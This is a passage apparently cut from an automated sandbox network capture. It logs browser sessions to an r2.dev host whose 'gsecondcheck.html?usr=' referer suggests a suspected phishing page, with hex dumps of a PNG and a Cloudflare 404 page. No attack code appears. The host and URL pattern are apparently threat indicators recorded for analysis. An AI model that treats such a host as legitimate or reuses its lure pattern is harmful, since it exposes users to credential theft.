                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Referer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-07-04 22:30:27 UTC637INHTTP/1.1 200 OK
                      Date: Thu, 04 Jul 2024 22:30:27 GMT
                      Content-Type: image/png
                      Content-Length: 57304
                      Connection: close
                      Last-Modified: Wed, 12 Aug 2020 20:27:15 GMT
                      Cache-Control: max-age=31536000
                      CF-Cache-Status: HIT
                      Age: 43926
                      Accept-Ranges: bytes
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JWL6Uvt916px%2Fe0y0jnzpvhahTTIQ9Kf9hdTVF2IV%2FYsW3r1%2F2isq4o%2FaBbdmp15Wm4clQ0mIWil1qkeV19k4khmon80gNoIR7j%2B5A9e3iHaItuigeGJPcXxW8Zj5oHpXJk%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 89e28f547b361831-EWR
                      2024-07-04 22:30:27 UTC732INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 02 57 08 06 00 00 00 f1 15 31 a9 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 08 f8 00 00 08 f8 01 f2 3d f9 ba 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 7b 94 5c 05 99 ef fd df b3 ab 3b 97 0e d7 04 04 e4 12 40 ee 21 e9 10 a2 c8 65 34 0a 08 3a 20 2a 36 02 a1 ab 2a 1d 68 34 4c d4 39 c7 b3 3c 33 67 d6 31 67 cd bc 33 bc 33 ef bc a3 03 12 08 04 3a 09 20 26 28 a3 20 20 02 41 84 70 b1 ed ee aa a6 b9 0b 72 53 f1 16 0c 10 48 ba 7b 3f e7 8f 04 87 c1 00 dd 49 75 3d b5 ab be 9f b5 58 2b e9 74 57 7d 59 2b ab 53 5d fb b7 f7 36 01 00 00 00 68 78 79 f5 9d 62 66 37 46 77
                      Data Ascii: PNGIHDRpW1sBIT|dpHYs=tEXtSoftwarewww.inkscape.org< IDATx{\;@!e4: *6*h4L9<3g1g33: &( AprSH{?Iu=X+tW}Y+S]6hxybf7Fw
                      2024-07-04 22:30:27 UTC1369INData Raw: 4a 1d f2 f2 96 fe 88 01 07 00 00 00 00 00 00 00 00 00 00 00 5b 6d f0 3c 49 e3 a2 2b 90 11 a9 2f 79 bb 3f 6a aa 66 07 00 00 00 00 00 00 00 00 00 00 00 f5 62 8e 56 37 b9 59 67 74 07 b2 c1 a5 3b 97 6b e6 c0 db fd 39 57 e0 00 00 00 00 00 00 00 00 00 00 00 60 2b ec ab 9d 3f 29 69 af e8 0e 64 84 6b f1 3b fd 31 03 0e 00 00 00 00 00 00 00 00 00 00 00 b6 82 9b 2d 88 6e 40 56 d8 af 26 68 f0 7b ef f4 19 0c 38 00 00 00 00 00 00 00 00 00 00 00 18 a5 a2 ca 87 48 fa 68 74 07 b2 c1 dd 2f 5b a2 d9 83 ef f4 39 0c 38 00 00 00 00 00 00 00 00 00 00 00 18 a5 34 d1 02 49 16 dd 81 4c 18 92 fc 8a 77 fb 24 06 1c 00 00 00 00 00 00 00 00 00 00 00 8c 42 a7 ba 5b cc fd 9c e8 0e 64 84 e9 86 e5 9a f9 c2 bb 7d 1a 03 0e 00 00 00 00 00 00 00 00 00 00 00 46 e1 75 35 b5 4b da 39 ba 03 d9 e0
                      Data Ascii: J[m<I+/y?jfbV7Ygt;k9W`+?)idk;1-n@V&h{8Hht/[984ILw$B[d}Fu5K9
                      2024-07-04 22:30:27 UTC1369INData Raw: 26 cd 95 34 39 ba 03 d9 60 6e 8b c7 fa 39 18 70 00 00 00 00 00 00 00 00 00 00 00 1a 8e 99 3e 1f dd 80 ac b0 5f 8d d3 c6 ff 18 eb 67 61 c0 01 00 00 00 00 00 00 00 00 00 00 68 28 79 95 8f 96 74 64 74 07 b2 c1 dc 97 2c d1 ec c1 b1 7e 1e 06 1c 00 00 00 00 00 00 00 00 00 00 80 86 62 89 16 44 37 20 33 86 06 a5 2b aa f1 44 0c 38 00 00 00 00 00 00 00 00 00 00 00 0d e3 2c 75 ef 22 f7 cf 46 77 20 33 fe e3 1a b5 3e 5f 8d 27 62 c0 01 00 00 00 00 00 00 00 00 00 00 68 18 e3 d5 74 ae a4 09 d1 1d c8 86 c4 b5 b8 6a cf 55 ad 27 02 00 00 00 00 00 00 00 00 00 00 20 d2 22 79 e2 66 9d d1 1d c8 8c 47 af d2 8c d5 d5 7a 32 06 1c 00 00 00 00 00 00 00 00 00 00 80 86 f0 b4 ca a7 48 da 2f ba 03 19 e1 5a 2c 99 57 eb e9 18 70 00 00 00 00 00 00 00 00 00 00 00 1a 82 99 16 44 37 20 33 d6
                      Data Ascii: &49`n9p>_gah(ytdt,~bD7 3+D8,u"Fw 3>_'bhtjU' "yfGz2H/Z,WpD7 3
                      2024-07-04 22:30:27 UTC1369INData Raw: 0c 37 2d 88 6e 40 66 0c 0d a5 7e 79 74 c4 48 31 e0 00 00 00 00 00 00 00 00 00 00 00 64 c2 7c f5 4c 95 fc e4 e8 0e 64 83 4b df bf 46 ad cf 47 77 8c 14 03 0e 00 00 00 00 00 00 00 00 00 00 40 26 0c 25 c9 02 49 b9 e8 0e 64 83 b9 2e 89 6e 18 0d 06 1c 00 00 00 00 00 00 00 00 00 00 80 9a b7 50 4f 8c 97 5b 31 ba 03 99 f1 c4 32 cd b8 33 3a 62 34 18 70 00 00 00 00 00 00 00 00 00 00 00 6a de 1f b5 fe 4c 49 ef 89 ee 40 36 b8 eb 9b 92 79 74 c7 68 30 e0 00 00 00 00 00 00 00 00 00 00 00 d4 3c 33 2d 88 6e 40 66 ac 1f 92 2d 8f 8e 18 2d 06 1c 00 00 00 00 00 00 00 00 00 00 80 9a 96 57 df 11 92 3e 10 dd 81 6c 70 d3 35 d7 6a c6 da e8 8e d1 62 c0 01 00 00 00 00 00 00 00 00 00 00 a8 69 96 68 61 74 03 b2 c3 52 bb 2c ba 61 6b 30 e0 00 00 00 00 00 00 00 00 00 00 00 d4 ac b3 55 de
                      Data Ascii: 7-n@f~ytH1d|LdKFGw@&%Id.nPO[123:b4pjLI@6yth0<3-n@f--W>lp5jbihatR,ak0U
                      2024-07-04 22:30:27 UTC1369INData Raw: 8e 92 24 f7 66 c9 b6 fb f3 47 b4 97 65 3e b4 e9 d7 fe aa a4 8d 92 64 d2 5a a5 7a 49 d2 4b a9 b4 d6 a5 97 36 7d 4f f7 b5 2e 7b 69 a2 06 d7 2e d1 ec c1 b1 ff 3f 06 d0 a8 0a 2a 9d 28 d9 41 d1 1d c8 08 f3 e5 d7 f8 07 d7 45 67 8c 35 8b 0e 00 00 00 d5 d5 ae d2 a4 66 e5 0e 18 d6 f0 01 26 3f d0 13 3b c0 5c 07 b8 7c 4f c9 76 97 b4 85 1f f4 ab e6 f7 92 9e 73 e9 29 99 7e ae d4 7f 9e 28 f7 54 4e 83 8f 2f d5 ac 67 02 bb 80 ba 97 57 df 29 66 76 63 74 07 2a 6a ed 32 6f 9d 1c 1d 11 6d be 06 26 0f 6a f8 e0 44 3a 58 89 1f e8 d2 81 72 1d 20 69 4f 49 ef a9 72 ce 06 c9 9f 93 ec 19 99 3f eb a9 3d 23 f9 cf 73 b2 87 5d 3b 3c dc a5 fd 5e af 72 0f 80 8c 58 a8 27 c6 af d5 c6 bd 73 1a 9a 6a f2 a9 92 ed e3 89 f6 33 d7 54 df f4 bd 6c 8a a4 c9 aa 9d 93 b5 06 25 fd da e5 cf 99 d9 0b 92
                      Data Ascii: $fGe>dZzIK6}O.{i.?*(AEg5f&?;\|Ovs)~(TN/gW)fvct*j2om&jD:Xr iOIr?=#s];<^rX'sj3Tl%
                      2024-07-04 22:30:27 UTC1369INData Raw: a9 fc d1 15 6a 7d 35 ba 23 eb 3a d5 dd b2 41 cd 1f 57 a2 d3 e5 f6 97 92 ef 10 dd 54 c7 7e e7 a6 1b 92 54 2b ba 34 e3 9e 2c 9d a9 37 4f a5 59 a9 8c 37 91 32 6a bc 36 96 97 68 f6 60 74 c7 5b 31 e0 a8 4b 99 1a 70 14 35 b0 bb 6b e8 1c 99 e6 4a 9a 19 dd 93 75 2e 2f 99 27 d7 a6 f2 ae 15 6a fd 4d 74 0f 50 6f 3a 54 de 7f 48 7e aa 99 4e 91 f4 21 49 e3 a2 9b b0 45 2f ba e9 b6 24 b5 1b 07 b5 fe 87 d7 e8 83 eb a2 83 00 d4 96 76 95 f6 4b 64 27 6e be da e9 c7 24 ed 18 dd 84 2d fa d3 6d 04 73 1a ba e9 4a cd fa 65 74 10 80 ad d7 a1 87 5a 87 6d b8 2f ba 03 59 61 37 2c f3 19 9f 89 ae a8 26 cb 5b e9 07 26 7d 22 3a 04 61 ee 5d e6 ad c7 45 47 a0 be 74 a8 bc ff b0 f9 93 62 a1 de 48 5e 1a ef 83 7b 2e d1 ec f5 d1 21 59 b4 79 b4 71 9a 4c a7 4b fa b8 a4 96 e8 a6 06 f4 73 73 5f 96
                      Data Ascii: j}5#:AWT~T+4,7OY72j6h`t[1Kp5kJu./'jMtPo:TH~N!IE/$vKd'n$-msJetZm/Ya7,&[&}":a]EGtbH^{.!YyqLKss_
                      2024-07-04 22:30:27 UTC1369INData Raw: 80 a3 5d fd 87 26 96 0e 88 75 6a a3 4a 9b 7c 78 ff a5 9a f5 4c 74 08 b2 ab 90 f4 fd bd dc fe 2e ba 03 55 e4 fa db 65 6a fd a7 e8 8c 5a 31 4f 3d bb ba 72 17 b8 e9 02 49 bb 44 f7 60 cc 6d 90 f9 b2 e6 34 f7 bf af d0 f4 17 ab f9 c4 0c 38 b2 8d 01 07 aa a8 ea 03 8e 36 ad 99 d8 a2 49 5f 96 d9 ff e4 0a 8f 99 f6 ac b9 ff 5d 97 5a af e6 be e1 a8 17 f3 d4 b3 eb b0 9a 3a cc d2 73 25 3b 20 ba 07 99 e5 92 ee 92 eb f2 f5 6a fa ce 2a 4d db 18 1d 04 34 9a 36 ad 99 38 49 2d 67 b9 d9 79 92 3e 18 dd 83 4c eb 77 d7 d2 09 1a ec 5a a2 d9 7f 8c 8e 01 ea dd 3c f5 ef 9d 5a fa 94 b8 3a 27 46 e6 fe 65 de 7a 74 74 44 94 e4 8d 5f ac d0 f4 47 24 dd 19 d8 82 58 c9 b0 72 f3 a2 23 90 5d 73 b4 ba 49 6e fc 1d 6a 2c 1b 9b 95 5c 19 1d 51 0b f2 7a 64 4a 21 29 fd 4b 6a b9 67 dc f4 35 31 de 68
                      Data Ascii: ]&ujJ|xLt.UejZ1O=rID`m486I_]Z:s%; j*M468I-gy>LwZ<Z:'FezttD_G$Xr#]sInj,\QzdJ!)Kjg51h
                      2024-07-04 22:30:27 UTC1369INData Raw: 97 dc 86 1e dd 7c c9 4e be 2f 62 6b 25 72 7d 71 9d ad ff 59 41 e5 23 a3 63 00 60 b4 da b4 32 57 50 e9 7f b9 25 6b 24 3b 20 ba 07 35 a3 c9 4d 5f 9b 64 07 ff 60 be 06 26 47 c7 a0 71 b4 ab 74 54 c1 4a b7 9b d9 4f 24 7d 28 ba 07 18 89 37 86 1c 45 2b df d7 ae be 93 a2 7b 80 5a 50 54 ef be 85 a4 b4 cc cd 1f da 3c dc e0 7d 17 d4 3c 93 a6 9a e9 eb eb 6c fd 23 45 f5 75 cc d1 6a 6e f1 03 bc 83 4e 75 ef 28 b7 b9 d1 1d c8 06 97 9e 59 af 27 6e 8d ee a8 05 5b 1c 70 74 e9 88 3e 49 f7 54 b9 05 b5 e3 a0 a2 ca c7 45 47 20 1b cc 74 5e 74 03 aa ca 73 a9 2e 8d 8e 18 6b ed 2a 7f 78 aa 4d ee 35 d3 d7 25 ed 18 dd 83 ba 31 4d e6 f7 e5 55 fa db 45 f2 2d be 06 03 80 5a 53 d4 c0 ee 2d 76 c8 cd 32 fd 83 b8 ff 38 b6 c0 a5 93 86 6c a8 af 5d fd b3 a3 5b 50 df 8a ea 3d b0 60 7d 37 24 a6
                      Data Ascii: |N/bk%r}qYA#c`2WP%k$; 5M_d`&GqtTJO$}(7E+{ZPT<}<l#EujnNu(Y'n[pt>ITEG t^ts.k*xM5%1MUE-ZS-v28l][P=`}7$
                      2024-07-04 22:30:27 UTC1369INData Raw: ac 42 0b 6a 90 bb e6 76 aa bb 25 ba 03 b5 c5 b4 71 9e 24 ce 02 69 20 9e 7a 5d dc 7f ac a8 d2 c9 4d a6 5e 49 c7 45 b7 00 6f e3 40 b7 e4 ee bc fa 67 44 87 00 68 0c 79 95 4f 33 b3 db 24 ed 1c dd 82 ba b5 8f 2c bd eb 1c 0d 70 fb 45 fc 99 a2 4a 27 6f b0 e6 87 e4 d6 29 2e af 0f 6c 81 1d 20 d3 8f f2 49 69 f9 59 ea de 25 ba 06 78 3b ed 2a 1d be e9 aa 1b 7e a1 78 cf 10 d8 92 9d 65 7e 59 c1 ca 77 15 55 3e 24 3a 06 18 4b 1b d4 fc 59 49 ef 8d ee 40 46 98 ba 56 a8 f5 d5 e8 8c 5a 33 a2 33 8f cd b9 0a 47 03 db 71 f3 37 5b e0 3f 99 58 4f 36 96 81 e5 9a 79 4f 74 c4 b6 68 d3 ca 5c 51 a5 45 6e fa 81 24 de f4 42 ad db dd 2c fd f1 3c f5 1f 13 1d 02 a0 be 15 55 3a d3 cc af 97 34 31 ba 05 75 6f af 9c 0d ad 66 c4 81 37 14 d5 bb 53 21 e9 bb ca 4d b7 48 da 2b ba 07 a8 71 66 ae f6
                      Data Ascii: Bjv%q$i z]M^IEo@gDhyO3$,pEJ'o).l IiY%x;*~xe~YwU>$:KYI@FVZ33Gq7[?XO6yOth\QEn$B,<U:41uof7S!MH+qf
                      2024-07-04 22:30:27 UTC1369INData Raw: 87 6d c3 1a 49 a7 47 b7 00 0d e8 f8 d4 72 bd 79 95 8f 8e 0e 01 46 c2 4d 0b a2 1b 90 1d c3 a9 b1 35 78 17 a3 1e 70 bc a6 57 af 91 f4 fb 31 68 41 ed 4b 06 95 2b 06 37 20 40 a7 ba 77 94 db 19 d1 1d a8 1e 77 bf 2c 2b f7 1f 2b aa f7 fd 6e 7e a7 a4 f7 46 b7 00 d5 61 27 4a 6a 8e ae 00 90 09 d6 64 2d 5d 92 0e 89 0e 01 de 89 99 2e 2d aa f7 fd d1 1d d8 76 79 95 ce 95 25 77 4a 7a 4f 74 0b d0 c0 8e 74 4b ba db d5 77 52 74 08 b2 eb 4d 63 bc c3 a3 5b 80 06 b6 a7 99 df 9d 57 f9 ab d1 21 c0 3b e9 50 cf 7b 4d 3a 35 ba 03 99 f1 c8 0a 4d bf 3b 3a a2 d6 8d 7a c0 b1 4a c7 bc e6 a6 2b c7 22 06 b5 cf 4c f3 b9 47 71 e3 79 5d cd 73 25 4d 8a ee 40 d5 0c 49 7e 45 74 c4 48 e4 d5 f7 11 b7 e4 0e 49 bb 44 b7 00 00 50 83 76 92 fc d3 d1 11 c0 08 4c 70 cb 7d af 43 3d 0c 72 33 aa 4d 2b 73
                      Data Ascii: mIGryFM5xpW1hAK+7 @ww,++n~Fa'Jjd-].-vy%wJzOttKwRtMc[W!;P{M:5M;:zJ+"LGqy]s%M@I~EtHIDPvLp}C=r3M+s


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.449747184.28.90.27443
                      TimestampBytes transferredDirectionData
                      2024-07-04 22:30:27 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      User-Agent: Microsoft BITS/7.8
                      Host: fs.microsoft.com
                      2024-07-04 22:30:27 UTC466INHTTP/1.1 200 OK
                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                      Content-Type: application/octet-stream
                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                      Server: ECAcc (chd/0758)
                      X-CID: 11
                      X-Ms-ApiVersion: Distribute 1.2
                      X-Ms-Region: prod-eus-z1
                      Cache-Control: public, max-age=30815
                      Date: Thu, 04 Jul 2024 22:30:27 GMT
                      Connection: close
                      X-CID: 2


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.449750104.18.2.354438C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-07-04 22:30:28 UTC693OUTGET /images/download_afD_icon.ico HTTP/1.1
                      Host: pub-431046b43b84431ea1b4a212cd34e302.r2.dev
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Referer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-07-04 22:30:28 UTC180INHTTP/1.1 404 Not Found
                      Date: Thu, 04 Jul 2024 22:30:28 GMT
                      Content-Type: text/html
                      Content-Length: 27150
                      Connection: close
                      Server: cloudflare
                      CF-RAY: 89e28f5d68df423a-EWR
                      2024-07-04 22:30:28 UTC1189INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79
                      Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <sty
                      2024-07-04 22:30:28 UTC1369INData Raw: 32 20 7b 0a 20 20 20 20 20 20 20 20 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 25 2c 0a 20 20 20 20 20 20 20 20 35 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 35 70 78 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 36 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 70 78 29 3b 0a 20 20 20 20
                      Data Ascii: 2 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px);
                      2024-07-04 22:30:28 UTC1369INData Raw: 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 4c 65 61 72 6e 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 72 32 2f 64 61 74 61 2d 61 63 63 65 73 73 2f 70 75 62 6c 69 63 2d 62 75 63 6b 65 74 73 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 50 75 62 6c 69 63 20 41 63 63 65 73 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 3c 73 65 63 74
                      Data Ascii: p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/" >Public Access</a > </p> </div> </section> <sect
                      2024-07-04 22:30:28 UTC1369INData Raw: 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 43 31 32 31 2e 30 35 33 20 31 33 2e 32 37 37 20 31 31 38 2e 32 30 34 20 31 30 2e 34 32 38 38 20 31 31 38 2e 32 30 34 20 36 2e 39 31 35 33 34 43 31 31 38 2e 32 30 34 20 33 2e 34 30 31 39 31 20 31 32 31 2e 30 35 33 20 30 2e 35 35 33 37 31 31 20 31 32 34 2e 35 36 36 20 30 2e 35 35 33 37 31 31 43 31 32 38 2e 30 38 20 30 2e 35 35 33 37 31 31 20 31 33 30 2e 39 32 38 20 33 2e 34 30 31 39 31 20 31 33 30 2e 39 32 38 20 36 2e 39 31 35 33 34 43 31 33 30 2e 39 32 38 20 31 30 2e 34 32 38 38 20 31 32 38 2e 30 38 20 31 33 2e 32 37 37 20 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43
                      Data Ascii: <path d="M124.566 13.277C121.053 13.277 118.204 10.4288 118.204 6.91534C118.204 3.40191 121.053 0.553711 124.566 0.553711C128.08 0.553711 130.928 3.40191 130.928 6.91534C130.928 10.4288 128.08 13.277 124.566 13.277Z" fill="#0055DC
                      2024-07-04 22:30:28 UTC1369INData Raw: 33 30 34 20 39 39 2e 36 31 34 39 43 37 33 2e 31 38 38 38 20 31 30 30 2e 38 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 48 37 35 2e 35 34 35 39 43 37 35 2e 35 34 35 39 20 31 30 38 2e 31 39 35 20 37 38 2e 33 33 35 33 20 39 35 2e 39 36 31 31 20 36 38 2e 36 38 36 38 20 39 34 2e 30 34 34 35 43 35 39 2e 30 33 38 34 20 39 32 2e 31 32 37 38 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 36 2e 31 37 36 20 31 31 31 2e 39 35 33 43 31
                      Data Ascii: 304 99.6149C73.1888 100.895 71.2559 108.195 71.2559 108.195H75.5459C75.5459 108.195 78.3353 95.9611 68.6868 94.0445C59.0384 92.1278 56.0777 105.406 56.0777 105.406Z" fill="#0055DC" /> <path d="M136.176 111.953C1
                      2024-07-04 22:30:28 UTC1369INData Raw: 2e 39 34 31 20 31 32 31 2e 31 37 20 31 30 38 2e 34 30 37 43 31 32 30 2e 37 30 34 20 31 30 38 2e 38 37 32 20 31 32 30 2e 33 33 35 20 31 30 39 2e 34 32 35 20 31 32 30 2e 30 38 33 20 31 31 30 2e 30 33 34 43 31 31 39 2e 38 33 31 20 31 31 30 2e 36 34 32 20 31 31 39 2e 37 30 31 20 31 31 31 2e 32 39 35 20 31 31 39 2e 37 30 31 20 31 31 31 2e 39 35 33 56 31 31 31 2e 39 35 33 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 33 38 34 20 31 31 31 2e 39 35 33 43 31 30 33 2e 33 38 34 20 31 31 32 2e 36 31 32 20 31 30 33 2e 35 31 33 20 31 31 33 2e 32 36 34 20 31 30 33 2e 37 36 36 20 31
                      Data Ascii: .941 121.17 108.407C120.704 108.872 120.335 109.425 120.083 110.034C119.831 110.642 119.701 111.295 119.701 111.953V111.953Z" fill="#0055DC" /> <path d="M103.384 111.953C103.384 112.612 103.513 113.264 103.766 1
                      2024-07-04 22:30:28 UTC1369INData Raw: 36 38 34 20 31 33 34 2e 39 39 35 20 33 31 2e 35 37 39 35 20 31 33 39 2e 37 39 32 20 33 31 2e 35 37 39 35 43 31 34 34 2e 35 38 39 20 33 31 2e 35 37 39 35 20 31 34 38 2e 34 37 38 20 33 35 2e 34 36 38 34 20 31 34 38 2e 34 37 38 20 34 30 2e 32 36 35 36 43 31 34 38 2e 34 37 38 20 34 35 2e 30 36 32 37 20 31 34 34 2e 35 38 39 20 34 38 2e 39 35 31 36 20 31 33 39 2e 37 39 32 20 34 38 2e 39 35 31 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20
                      Data Ascii: 684 134.995 31.5795 139.792 31.5795C144.589 31.5795 148.478 35.4684 148.478 40.2656C148.478 45.0627 144.589 48.9516 139.792 48.9516Z" fill="white" stroke="#0055DC" stroke-width="2" stroke-miterlimit="10"
                      2024-07-04 22:30:28 UTC1369INData Raw: 32 2e 34 39 32 31 20 31 31 35 2e 36 38 20 34 31 2e 34 32 31 36 20 31 31 35 2e 36 38 20 34 30 2e 33 30 35 35 43 31 31 35 2e 36 37 38 20 33 39 2e 31 39 30 37 20 31 31 35 2e 32 33 34 20 33 38 2e 31 32 32 34 20 31 31 34 2e 34 34 35 20 33 37 2e 33 33 34 39 43 31 31 33 2e 36 35 36 20 33 36 2e 35 34 37 34 20 31 31 32 2e 35 38 36 20 33 36 2e 31 30 35 32 20 31 31 31 2e 34 37 32 20 33 36 2e 31 30 35 32 43 31 31 30 2e 33 35 38 20 33 36 2e 31 30 37 33 20 31 30 39 2e 32 39 31 20 33 36 2e 35 35 30 36 20 31 30 38 2e 35 30 34 20 33 37 2e 33 33 37 38 43 31 30 37 2e 37 31 37 20 33 38 2e 31 32 35 20 31 30 37 2e 32 37 34 20 33 39 2e 31 39 32 31 20 31 30 37 2e 32 37 31 20 34 30 2e 33 30 35 35 56 34 30 2e 33 30 35 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d
                      Data Ascii: 2.4921 115.68 41.4216 115.68 40.3055C115.678 39.1907 115.234 38.1224 114.445 37.3349C113.656 36.5474 112.586 36.1052 111.472 36.1052C110.358 36.1073 109.291 36.5506 108.504 37.3378C107.717 38.125 107.274 39.1921 107.271 40.3055V40.3055Z" fill=
